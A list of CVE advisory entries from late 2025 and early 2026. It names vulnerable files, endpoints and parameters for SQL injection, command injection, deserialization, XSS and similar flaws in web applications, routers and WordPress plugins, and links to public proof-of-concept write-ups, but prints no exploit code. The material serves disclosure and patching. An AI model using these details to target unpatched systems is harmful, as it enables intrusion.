| code-projects--Refugee Food Management System | A security vulnerability has been detected in code-projects Refugee Food Management System 1.0. This vulnerability affects unknown code of the file /home/editrefugee.php. Such manipulation of the argument a/b/c/sex/d/e/nationality_nid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. | 2025-12-29 | 6.3 | CVE-2025-15210 | VDB-338595 | code-projects Refugee Food Management System editrefugee.php sql injection VDB-338595 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #722804 | code-projects Refugee Food Management System 1.0 SQL Injection https://github.com/YZS17/CVE/blob/main/Refugee%20Food_Management_System/sqli_editrefugee.php.md https://code-projects.org/ |
| code-projects--Refugee Food Management System | A flaw has been found in code-projects Refugee Food Management System 1.0. Impacted is an unknown function of the file /home/refugee.php. Executing manipulation of the argument refNo/Fname/Lname/sex/age/contact/nationality_nid can lead to sql injection. The attack can be executed remotely. The exploit has been published and may be used. | 2025-12-30 | 6.3 | CVE-2025-15211 | VDB-338597 | code-projects Refugee Food Management System refugee.php sql injection VDB-338597 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #722806 | code-projects Refugee Food Management System 1.0 SQL Injection https://github.com/YZS17/CVE/blob/main/Refugee%20Food_Management_System/sqli_refugee.php.md https://code-projects.org/ |
| code-projects--Refugee Food Management System | A vulnerability was detected in code-projects Refugee Food Management System 1.0. This issue affects some unknown processing of the file /home/regfood.php. Performing manipulation of the argument a results in sql injection. Remote exploitation of the attack is possible. The exploit is now public and may be used. | 2025-12-30 | 6.3 | CVE-2025-15212 | VDB-338596 | code-projects Refugee Food Management System regfood.php sql injection VDB-338596 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #722807 | code-projects Refugee Food Management System 1.0 SQL Injection Submit #724712 | Code-projects Refugee Food Management System v1.0 SQL injection (Duplicate) https://github.com/YZS17/CVE/blob/main/Refugee%20Food_Management_System/sqli_regfood.php.md https://code-projects.org/ |
| aizuda--snail-job | A vulnerability was determined in aizuda snail-job up to 1.7.0 on macOS. Affected by this vulnerability is the function FurySerializer.deserialize of the component API. This manipulation of the argument argsStr causes deserialization. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. | 2025-12-30 | 6.3 | CVE-2025-15246 | VDB-338636 | aizuda snail-job API FurySerializer.deserialize deserialization VDB-338636 | CTI Indicators (IOB, IOC, IOA) https://gitee.com/aizuda/snail-job/issues/ICQV61 |
| Tenda--W6-S | A vulnerability was found in Tenda W6-S 1.0.0.4(510). This affects the function TendaAte of the file /goform/ate of the component ATE Service. Performing manipulation results in os command injection. The attack may be initiated remotely. The exploit has been made public and could be used. | 2025-12-30 | 6.3 | CVE-2025-15254 | VDB-338644 | Tenda W6-S ATE Service ate TendaAte os command injection VDB-338644 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #725499 | Tenda W6-S V1.0.0.4(510) OS Command Injection https://github.com/dwBruijn/CVEs/blob/main/Tenda/ate.md https://www.tenda.com.cn/ |
| NetVision Information--ISOinsight | ISOinsight, developed by NetVision Information, has a reflected cross-site scripting vulnerability that allows unauthenticated remote attackers to execute arbitrary JavaScript code in a user's browser through phishing attacks. | 2025-12-30 | 6.1 | CVE-2025-15355 | https://www.twcert.org.tw/tw/cp-132-10609-0221b-1.html https://www.twcert.org.tw/en/cp-139-10610-b98b4-2.html |
| D-Link--DI-7400G+ | A vulnerability was found in D-Link DI-7400G+ 19.12.25A1. This affects an unknown function of the file /msp_info.htm?flag=cmd. The manipulation of the argument cmd results in command injection. The attack can be launched remotely. The exploit has been made public and could be used. | 2025-12-30 | 6.3 | CVE-2025-15357 | VDB-338743 | D-Link DI-7400G+ msp_info.htm command injection VDB-338743 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #726376 | D-Link D-Link DI_7400G+ V19.12.25A1 Command Injection https://github.com/xyh4ck/iot_poc/tree/main/D-Link_DI_7400G%2B_Command_Injection https://www.dlink.com/ |
| n/a--EyouCMS | A security vulnerability has been detected in EyouCMS up to 1.7.7. Impacted is the function saveRemote of the file application/function.php. Such manipulation leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. The vendor is "[a]cknowledging the existence of the vulnerability, we have completed the fix and will release a new version, v1.7.8". | 2025-12-31 | 6.3 | CVE-2025-15373 | VDB-339081 | EyouCMS function.php saveRemote server-side request forgery VDB-339081 | CTI Indicators (IOB, IOC, IOA) Submit #718465 | Eyoucms 1.7.7 SSRF Vulnerability https://note-hxlab.wetolink.com/share/DeUFyoSjsPPK https://note-hxlab.wetolink.com/share/DeUFyoSjsPPK#-span--strong-proof-of-concept---strong---span- |
| n/a--EyouCMS | A flaw has been found in EyouCMS up to 1.7.7. The impacted element is the function unserialize of the file application/api/controller/Ajax.php of the component arcpagelist Handler. Executing manipulation of the argument attstr can lead to deserialization. The attack can be launched remotely. The exploit has been published and may be used. The vendor is "[a]cknowledging the existence of the vulnerability, we have completed the fix and will release a new version, v1.7.8". | 2025-12-31 | 6.3 | CVE-2025-15375 | VDB-339083 | EyouCMS arcpagelist Ajax.php unserialize deserialization VDB-339083 | CTI Indicators (IOB, IOC, IOA) Submit #718481 | EyouCMS 1.7.7 Deserialization https://note-hxlab.wetolink.com/share/2wLgcbKe9Toh https://note-hxlab.wetolink.com/share/2wLgcbKe9Toh#-span--strong-proof-of-concept---strong---span- |
| PHPGurukul--Small CRM | A security flaw has been discovered in PHPGurukul Small CRM 4.0. This impacts an unknown function of the file /admin/edit-user.php. The manipulation results in missing authorization. It is possible to launch the attack remotely. The exploit has been released to the public and may be exploited. | 2025-12-31 | 6.3 | CVE-2025-15390 | VDB-339151 | PHPGurukul Small CRM edit-user.php authorization VDB-339151 | CTI Indicators (IOB, IOC, IOA) Submit #727430 | PHPGurukul PHPGurukul Small Customer Relationship Management v4.0 Missing Authorization https://github.com/rsecroot/Small-Customer-Relationship-Management-CRM-in-PHP/blob/main/Broken%20Access%20Control.md https://phpgurukul.com/ |
| D-Link--DIR-806A | A weakness has been identified in D-Link DIR-806A 100CNb11. Affected is the function ssdpcgi_main of the component SSDP Request Handler. This manipulation causes command injection. The attack can be initiated remotely. The exploit has been made available to the public and could be exploited. This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-31 | 6.3 | CVE-2025-15391 | VDB-339152 | D-Link DIR-806A SSDP Request ssdpcgi_main command injection VDB-339152 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #727637 | D-Link DIR-806A DIR806A1_FW100CNb11.bin Command Injection https://github.com/ccc-iotsec/cve-/blob/D-Link/D-Link%20DIR-806A%E6%9C%AA%E6%8E%88%E6%9D%83RCE.md https://www.dlink.com/ |
| Kohana--KodiCMS | A weakness has been identified in Kohana KodiCMS up to 13.82.135. This affects the function like of the file cms/modules/pages/classes/kodicms/model/page.php of the component Search API Endpoint. Executing manipulation of the argument keyword can lead to sql injection. It is possible to launch the attack remotely. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-31 | 6.3 | CVE-2025-15392 | VDB-339161 | Kohana KodiCMS Search API Endpoint page.php like sql injection VDB-339161 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #718289 | KodiCMS https://github.com/KodiCMS-Kohana/cms 13.82.135 SQL Injection |
| Kohana--KodiCMS | A security vulnerability has been detected in Kohana KodiCMS up to 13.82.135. This impacts the function Save of the file cms/modules/kodicms/classes/kodicms/model/file.php of the component Layout API Endpoint. The manipulation of the argument content leads to code injection. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-31 | 6.3 | CVE-2025-15393 | VDB-339162 | Kohana KodiCMS Layout API Endpoint file.php save code injection VDB-339162 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #718290 | KodiCMS https://github.com/KodiCMS-Kohana/cms 13.82.135 Code Injection |
| campcodes--School File Management System | A security vulnerability has been detected in campcodes School File Management System 1.0. The affected element is an unknown function of the file /save_file.php. The manipulation of the argument File leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. | 2026-01-01 | 6.3 | CVE-2025-15404 | VDB-339324 | campcodes School File Management System save_file.php unrestricted upload VDB-339324 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #728102 | campcodes School File Management System V1.0 Unrestricted Upload https://github.com/LaneyYu/cve/issues/7 https://www.campcodes.com/ |
| PHPGurukul--Online Course Registration | A flaw has been found in PHPGurukul Online Course Registration up to 3.1. This affects an unknown function. This manipulation causes missing authorization. Remote exploitation of the attack is possible. The exploit has been published and may be used. | 2026-01-01 | 6.3 | CVE-2025-15406 | VDB-339326 | PHPGurukul Online Course Registration authorization VDB-339326 | CTI Indicators (IOB, IOC) Submit #728354 | PHPGurukul Online Course Registration v3.1 Missing Authorization https://github.com/rsecroot/Online-Course-Registration/blob/main/Broken%20Access%20Control.md https://phpgurukul.com/ |
| EmpireSoft--EmpireCMS | A vulnerability has been found in EmpireSoft EmpireCMS up to 8.0. Impacted is the function CheckSaveTranFiletype of the file e/class/connect.php. Such manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-02 | 6.3 | CVE-2025-15423 | VDB-339345 | EmpireSoft EmpireCMS connect.php CheckSaveTranFiletype unrestricted upload VDB-339345 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721346 | EmpireSoft EmpireCMS <= 8.0 Unrestricted Upload https://note-hxlab.wetolink.com/share/28QXRLje7Uz1 https://note-hxlab.wetolink.com/share/28QXRLje7Uz1#-span--strong-proof-of-concept---strong---span- |
| n/a--Daptin | A vulnerability was identified in Daptin 0.10.3. Affected by this vulnerability is the function goqu.L of the file server/resource/resource_aggregate.go of the component Aggregate API. The manipulation of the argument column/group/order leads to sql injection. The attack may be initiated remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-02 | 6.3 | CVE-2025-15439 | VDB-339384 | Daptin Aggregate API resource_aggregate.go goqu.L sql injection VDB-339384 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #719742 | Daptin https://github.com/daptin/daptin 0.10.3 SQL Injection https://note-hxlab.wetolink.com/share/yMZ8oEgMTAur https://note-hxlab.wetolink.com/share/yMZ8oEgMTAur#-span--strong-proof-of-concept---strong---span- |
| AA-Team--Pro Bulk Watermark Plugin for WordPress | Path Traversal: '.../...//' vulnerability in AA-Team Pro Bulk Watermark Plugin for WordPress allows Path Traversal. This issue affects Pro Bulk Watermark Plugin for WordPress: from n/a through 2.0. | 2025-12-31 | 6.5 | CVE-2025-28973 | https://vdp.patchstack.com/database/wordpress/theme/pro-watermark/vulnerability/wordpress-pro-bulk-watermark-plugin-for-wordpress-2-0-path-traversal-vulnerability?_s_id=cve |
| Petlibro--Smart Pet Feeder Platform | Petlibro Smart Pet Feeder Platform versions up to 1.7.31 contain a broken access control vulnerability that allows authenticated users to access other users' pet data by exploiting missing ownership verification. Attackers can send requests to /member/pet/detailV2 with arbitrary pet IDs to retrieve sensitive information including pet details, member IDs, and avatar URLs without proper authorization checks. | 2026-01-03 | 6.5 | CVE-2025-3660 | Security Research: Petlibro: Your Pet Feeder Is Feeding Data To Anyone Who Asks VulnCheck Advisory: Petlibro Smart Pet Feeder Platform through 1.7.31 Broken Access Control via API endpoint |
| Audiomack--Audiomack | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Audiomack allows Stored XSS. This issue affects Audiomack: from n/a through 1.4.8. | 2025-12-31 | 6.5 | CVE-2025-49357 | https://vdp.patchstack.com/database/wordpress/plugin/audiomack/vulnerability/wordpress-audiomack-plugin-1-4-8-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Ruhul Amin--Content Fetcher | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ruhul Amin Content Fetcher allows DOM-Based XSS. This issue affects Content Fetcher: from n/a through 1.1. | 2025-12-31 | 6.5 | CVE-2025-49358 | https://vdp.patchstack.com/database/wordpress/plugin/content-fetcher/vulnerability/wordpress-content-fetcher-plugin-1-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Priority--Web | CWE-601 URL Redirection to Untrusted Site ('Open Redirect') | 2025-12-29 | 6.1 | CVE-2025-55060 | https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0 |
| Neilgee--Bootstrap Modals | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Neilgee Bootstrap Modals allows Stored XSS. This issue affects Bootstrap Modals: from n/a through 1.3.2. | 2025-12-31 | 6.5 | CVE-2025-62095 | https://vdp.patchstack.com/database/wordpress/plugin/bootstrap-modals/vulnerability/wordpress-bootstrap-modals-plugin-1-3-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| WPFactory--Maximum Products per User for WooCommerce | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPFactory Maximum Products per User for WooCommerce allows Stored XSS. This issue affects Maximum Products per User for WooCommerce: from n/a through 4.4.2. | 2025-12-31 | 6.5 | CVE-2025-62096 | https://vdp.patchstack.com/database/wordpress/plugin/maximum-products-per-user-for-woocommerce/vulnerability/wordpress-maximum-products-per-user-for-woocommerce-plugin-4-4-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| SEOthemes--SEO Slider | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SEOthemes SEO Slider allows DOM-Based XSS. This issue affects SEO Slider: from n/a through 1.1.1. | 2025-12-31 | 6.5 | CVE-2025-62097 | https://vdp.patchstack.com/database/wordpress/plugin/seo-slider/vulnerability/wordpress-seo-slider-plugin-1-1-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Webvitaly--Extra Shortcodes | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Webvitaly Extra Shortcodes allows Stored XSS. This issue affects Extra Shortcodes: from n/a through 2.2. | 2025-12-31 | 6.5 | CVE-2025-62111 | https://vdp.patchstack.com/database/wordpress/plugin/extra-shortcodes/vulnerability/wordpress-extra-shortcodes-plugin-2-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| kcseopro--AdWords Conversion Tracking Code | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in kcseopro AdWords Conversion Tracking Code allows Stored XSS. This issue affects AdWords Conversion Tracking Code: from n/a through 1.0. | 2025-12-31 | 6.5 | CVE-2025-62118 | https://vdp.patchstack.com/database/wordpress/plugin/adwords-conversion-tracking-code/vulnerability/wordpress-adwords-conversion-tracking-code-plugin-1-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Anshul Gangrade--Custom Background Changer | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Anshul Gangrade Custom Background Changer custom-background-changer allows Stored XSS. This issue affects Custom Background Changer: from n/a through 3.0. | 2025-12-31 | 6.5 | CVE-2025-62125 | https://vdp.patchstack.com/database/wordpress/plugin/custom-background-changer/vulnerability/wordpress-custom-background-changer-plugin-3-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| landwire--Responsive Block Control | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in landwire Responsive Block Control allows DOM-Based XSS. This issue affects Responsive Block Control: from n/a through 1.2.9. | 2025-12-31 | 6.5 | CVE-2025-62135 | https://vdp.patchstack.com/database/wordpress/plugin/responsive-block-control/vulnerability/wordpress-responsive-block-control-plugin-1-2-9-cross-site-scripting-xss-vulnerability?_s_id=cve |
| ThinkUpThemes--Melos | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThinkUpThemes Melos allows Stored XSS. This issue affects Melos: from n/a through 1.6.0. | 2025-12-31 | 6.5 | CVE-2025-62136 | https://vdp.patchstack.com/database/wordpress/theme/melos/vulnerability/wordpress-melos-theme-1-6-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Shuttlethemes--Shuttle | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Shuttlethemes Shuttle allows Stored XSS. This issue affects Shuttle: from n/a through 1.5.0. | 2025-12-31 | 6.5 | CVE-2025-62137 | https://vdp.patchstack.com/database/wordpress/theme/shuttle/vulnerability/wordpress-shuttle-theme-1-5-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Maksym Marko--MX Time Zone Clocks | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Maksym Marko MX Time Zone Clocks allows Stored XSS. This issue affects MX Time Zone Clocks: from n/a through 5.1.1. | 2025-12-31 | 6.5 | CVE-2025-62146 | https://vdp.patchstack.com/database/wordpress/plugin/mx-time-zone-clocks/vulnerability/wordpress-mx-time-zone-clocks-plugin-5-1-1-cross-site-scripting-xss-vulnerability-2?_s_id=cve |
| Curator.io--Curator.io | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Curator.Io allows Stored XSS. This issue affects Curator.Io: from n/a through 1.9.5. | 2025-12-31 | 6.5 | CVE-2025-62742 | https://vdp.patchstack.com/database/wordpress/plugin/curatorio/vulnerability/wordpress-curator-io-plugin-1-9-5-cross-site-scripting-xss-vulnerability?_s_id=cve |
| zookatron--MyBookTable Bookstore | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in zookatron MyBookTable Bookstore allows Stored XSS. This issue affects MyBookTable Bookstore: from n/a through 3.5.5. | 2025-12-31 | 6.5 | CVE-2025-62743 | https://vdp.patchstack.com/database/wordpress/plugin/mybooktable/vulnerability/wordpress-mybooktable-bookstore-plugin-3-5-5-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Chris Steman--Page Title Splitter | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Chris Steman Page Title Splitter allows Stored XSS. This issue affects Page Title Splitter: from n/a through 2.5.9. | 2025-12-31 | 6.5 | CVE-2025-62744 | https://vdp.patchstack.com/database/wordpress/plugin/page-title-splitter/vulnerability/wordpress-page-title-splitter-plugin-2-5-9-cross-site-scripting-xss-vulnerability?_s_id=cve |
| CodeFlavors--Featured Video for WordPress & VideographyWP | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CodeFlavors Featured Video for WordPress & VideographyWP allows Stored XSS. This issue affects Featured Video for WordPress & VideographyWP: from n/a through 1.0.18. | 2025-12-30 | 6.5 | CVE-2025-62746 | https://vdp.patchstack.com/database/wordpress/plugin/videographywp/vulnerability/wordpress-featured-video-for-wordpress-videographywp-plugin-1-0-18-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Genetech Products--Web and WooCommerce Addons for WPBakery Builder | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Genetech Products Web and WooCommerce Addons for WPBakery Builder allows DOM-Based XSS. This issue affects Web and WooCommerce Addons for WPBakery Builder: from n/a through 1.5. | 2025-12-31 | 6.5 | CVE-2025-62748 | https://vdp.patchstack.com/database/wordpress/plugin/vc-addons-by-bit14/vulnerability/wordpress-web-and-woocommerce-addons-for-wpbakery-builder-plugin-1-5-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Bainternet--User Specific Content | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Bainternet User Specific Content allows DOM-Based XSS.This issue affects User Specific Content: from n/a through 1.0.6. | 2025-12-31 | 6.5 | CVE-2025-62749 | https://vdp.patchstack.com/database/wordpress/plugin/user-specific-content/vulnerability/wordpress-user-specific-content-plugin-1-0-6-cross-site-scripting-xss-vulnerability?_s_id=cve |
| kalender.digital--Calendar.online / Kalender.digital | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in kalender.Digital Calendar.Online / Kalender.Digital allows DOM-Based XSS.This issue affects Calendar.Online / Kalender.Digital: from n/a through 1.0.11. | 2025-12-31 | 6.5 | CVE-2025-62752 | https://vdp.patchstack.com/database/wordpress/plugin/kalender-digital/vulnerability/wordpress-calendar-online-kalender-digital-plugin-1-0-11-cross-site-scripting-xss-vulnerability?_s_id=cve |
| lvaudore--The Moneytizer | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in lvaudore The Moneytizer allows DOM-Based XSS.This issue affects The Moneytizer: from n/a through 10.0.6. | 2025-12-31 | 6.5 | CVE-2025-62756 | https://vdp.patchstack.com/database/wordpress/plugin/the-moneytizer/vulnerability/wordpress-the-moneytizer-plugin-10-0-6-cross-site-scripting-xss-vulnerability?_s_id=cve |
| WebMan Design | Oliver Juhas--WebMan Amplifier | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WebMan Design | Oliver Juhas WebMan Amplifier allows DOM-Based XSS.This issue affects WebMan Amplifier: from n/a through 1.5.12. | 2025-12-31 | 6.5 | CVE-2025-62757 | https://vdp.patchstack.com/database/wordpress/plugin/webman-amplifier/vulnerability/wordpress-webman-amplifier-plugin-1-5-12-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Funnelforms--Funnelforms Free | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Funnelforms Funnelforms Free allows DOM-Based XSS.This issue affects Funnelforms Free: from n/a through 3.8. | 2025-12-31 | 6.5 | CVE-2025-62758 | https://vdp.patchstack.com/database/wordpress/plugin/funnelforms-free/vulnerability/wordpress-funnelforms-free-plugin-3-8-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Justin Tadlock--Series | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Justin Tadlock Series allows Stored XSS.This issue affects Series: from n/a through 2.0.1. | 2025-12-31 | 6.5 | CVE-2025-62759 | https://vdp.patchstack.com/database/wordpress/plugin/series/vulnerability/wordpress-series-plugin-2-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| BuddyDev--BuddyPress Activity Shortcode | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BuddyDev BuddyPress Activity Shortcode allows Stored XSS.This issue affects BuddyPress Activity Shortcode: from n/a through 1.1.8. | 2025-12-31 | 6.5 | CVE-2025-62760 | https://vdp.patchstack.com/database/wordpress/plugin/bp-activity-shortcode/vulnerability/wordpress-buddypress-activity-shortcode-plugin-1-1-8-cross-site-scripting-xss-vulnerability?_s_id=cve |
| BasePress--Knowledge Base documentation & wiki plugin BasePress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BasePress Knowledge Base documentation & wiki plugin - BasePress allows Stored XSS.This issue affects Knowledge Base documentation & wiki plugin - BasePress: from n/a through 2.17.0.1. | 2025-12-31 | 6.5 | CVE-2025-62761 | https://vdp.patchstack.com/database/wordpress/plugin/basepress/vulnerability/wordpress-knowledge-base-documentation-wiki-plugin-basepress-plugin-2-17-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Livemesh--Livemesh Addons for Beaver Builder | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Livemesh Livemesh Addons for Beaver Builder addons-for-beaver-builder allows Stored XSS.This issue affects Livemesh Addons for Beaver Builder: from n/a through 3.9.2. | 2025-12-31 | 6.5 | CVE-2025-62990 | https://vdp.patchstack.com/database/wordpress/plugin/addons-for-beaver-builder/vulnerability/wordpress-livemesh-addons-for-beaver-builder-plugin-3-9-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| ThinkUpThemes--Minamaze | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThinkUpThemes Minamaze allows Stored XSS.This issue affects Minamaze: from n/a through 1.10.1. | 2025-12-31 | 6.5 | CVE-2025-62991 | https://vdp.patchstack.com/database/wordpress/theme/minamaze/vulnerability/wordpress-minamaze-theme-1-10-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Everest themes--Everest Backup | Cross-Site Request Forgery (CSRF) vulnerability in Everest themes Everest Backup allows Path Traversal.This issue affects Everest Backup: from n/a through 2.3.9. | 2025-12-31 | 6.5 | CVE-2025-62992 | https://vdp.patchstack.com/database/wordpress/plugin/everest-backup/vulnerability/wordpress-everest-backup-plugin-2-3-9-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| WP for church--Sermon Manager | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP for church Sermon Manager allows Stored XSS.This issue affects Sermon Manager: from n/a through 2.30.0. | 2025-12-31 | 6.5 | CVE-2025-63000 | https://vdp.patchstack.com/database/wordpress/plugin/sermon-manager-for-wordpress/vulnerability/wordpress-sermon-manager-plugin-2-30-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Tomas--WordPress Tooltips | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Tomas WordPress Tooltips allows Stored XSS.This issue affects WordPress Tooltips: from n/a through 10.7.9. | 2025-12-31 | 6.5 | CVE-2025-63005 | https://vdp.patchstack.com/database/wordpress/plugin/wordpress-tooltips/vulnerability/wordpress-wordpress-tooltips-plugin-10-7-9-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Wayne Allen--Postie | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Wayne Allen Postie postie allows Stored XSS.This issue affects Postie: from n/a through 1.9.73. | 2025-12-31 | 6.5 | CVE-2025-63020 | https://vdp.patchstack.com/database/wordpress/plugin/postie/vulnerability/wordpress-postie-plugin-1-9-73-cross-site-scripting-xss-vulnerability?_s_id=cve |
| codetipi--Valenti Engine | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in codetipi Valenti Engine allows DOM-Based XSS.This issue affects Valenti Engine: from n/a through 1.0.3. | 2025-12-31 | 6.5 | CVE-2025-63021 | https://vdp.patchstack.com/database/wordpress/plugin/valenti-engine/vulnerability/wordpress-valenti-engine-plugin-1-0-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Webcreations907--WBC907 Core | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Webcreations907 WBC907 Core allows Stored XSS.This issue affects WBC907 Core: from n/a through 3.4.1. | 2025-12-30 | 6.5 | CVE-2025-63027 | https://vdp.patchstack.com/database/wordpress/plugin/wbc907-core/vulnerability/wordpress-wbc907-core-plugin-3-4-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| ThinkUpThemes--Consulting | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThinkUpThemes Consulting allows Stored XSS.This issue affects Consulting: from n/a through 1.5.0. | 2025-12-31 | 6.5 | CVE-2025-63032 | https://vdp.patchstack.com/database/wordpress/theme/consulting/vulnerability/wordpress-consulting-theme-1-5-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| 8theme.com--XStore Core | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in 8theme.Com XStore Core allows DOM-Based XSS.This issue affects XStore Core: from n/a before 5.6. | 2025-12-30 | 6.5 | CVE-2025-64190 | https://vdp.patchstack.com/database/wordpress/plugin/et-core-plugin/vulnerability/wordpress-xstore-core-plugin-5-6-cross-site-scripting-xss-vulnerability-2?_s_id=cve |
| dmccan--Yada Wiki | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Yada Wiki yada-wiki allows Stored XSS.This issue affects Yada Wiki: from n/a through 3.5. | 2025-12-30 | 6.5 | CVE-2025-66094 | https://vdp.patchstack.com/database/wordpress/plugin/yada-wiki/vulnerability/wordpress-yada-wiki-plugin-3-5-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Revmakx--WPCal.io | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Revmakx WPCal.Io allows DOM-Based XSS.This issue affects WPCal.Io: from n/a through 0.9.5.9. | 2025-12-30 | 6.5 | CVE-2025-66103 | https://vdp.patchstack.com/database/wordpress/plugin/wpcal/vulnerability/wordpress-wpcal-io-plugin-0-9-5-9-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Esri--ArcGIS Server | There is a stored cross-site scripting issue in Esri ArcGIS Server 11.4 and earlier on Windows and Linux that in some configurations allows a remote unauthenticated attacker to store files containing malicious code that may execute in the context of a victim's browser. | 2025-12-31 | 6.1 | CVE-2025-67703 | https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/arcgis-server-security-2025-update-2-patch |
| Esri--ArcGIS Server | There is a stored cross-site scripting issue in Esri ArcGIS Server 11.4 and earlier on Windows and Linux that in some configurations allows a remote unauthenticated attacker to store files containing malicious code that may execute in the context of a victim's browser. | 2025-12-31 | 6.1 | CVE-2025-67704 | https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/arcgis-server-security-2025-update-2-patch |
| Esri--ArcGIS Server | There is a stored cross-site scripting issue in Esri ArcGIS Server 11.4 and earlier on Windows and Linux that in some configurations allows a remote unauthenticated attacker to store files containing malicious code that may execute in the context of a victim's browser. | 2025-12-31 | 6.1 | CVE-2025-67705 | https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/arcgis-server-security-2025-update-2-patch |
| Esri--ArcGIS Server | There is a stored cross-site scripting issue in Esri ArcGIS Server 11.4 and earlier on Windows and Linux that in some configurations allows a remote unauthenticated attacker to store files containing malicious code that may execute in the context of a victim's browser. | 2025-12-31 | 6.1 | CVE-2025-67708 | https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/arcgis-server-security-2025-update-2-patch |
| Esri--ArcGIS Server | There is a stored cross-site scripting issue in Esri ArcGIS Server 11.4 and earlier on Windows and Linux that in some configurations allows a remote unauthenticated attacker to store files containing malicious code that may execute in the context of a victim's browser. | 2025-12-31 | 6.1 | CVE-2025-67709 | https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/arcgis-server-security-2025-update-2-patch |
